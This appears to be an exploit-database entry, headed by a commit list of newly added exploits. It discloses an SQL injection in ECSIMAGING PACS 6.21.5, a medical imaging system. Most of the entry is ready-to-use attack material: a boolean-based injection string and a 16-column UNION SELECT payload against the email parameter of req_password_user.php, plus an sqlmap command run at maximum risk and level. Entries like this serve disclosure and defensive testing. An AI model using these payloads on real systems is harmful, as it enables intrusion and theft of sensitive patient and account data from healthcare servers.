62b3c868cf
7 changes to exploits/shellcodes iBall-Baton WRA150N Rom-0 Backup - File Disclosure (Sensitive Information) ECSIMAGING PACS 6.21.5 - Remote code execution Employee Record System 1.0 - Unrestricted File Upload to Remote Code Execution Cockpit CMS 0.6.1 - Remote Code Execution Curfew e-Pass Management System 1.0 - Stored XSS ECSIMAGING PACS 6.21.5 - SQL injection CRUD Operation 1.0 - Multiple Stored XSS
14 lines
No EOL
761 B
Text
14 lines
No EOL
761 B
Text
# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
|
|
# Date: 06/01/2021
|
|
# Exploit Author: shoxxdj
|
|
# Vendor Homepage: https://www.medicalexpo.fr/
|
|
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
|
|
# Tested on: Linux
|
|
|
|
ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability
|
|
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )
|
|
|
|
Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
|
|
/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001
|
|
|
|
SQLMAP : sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5 |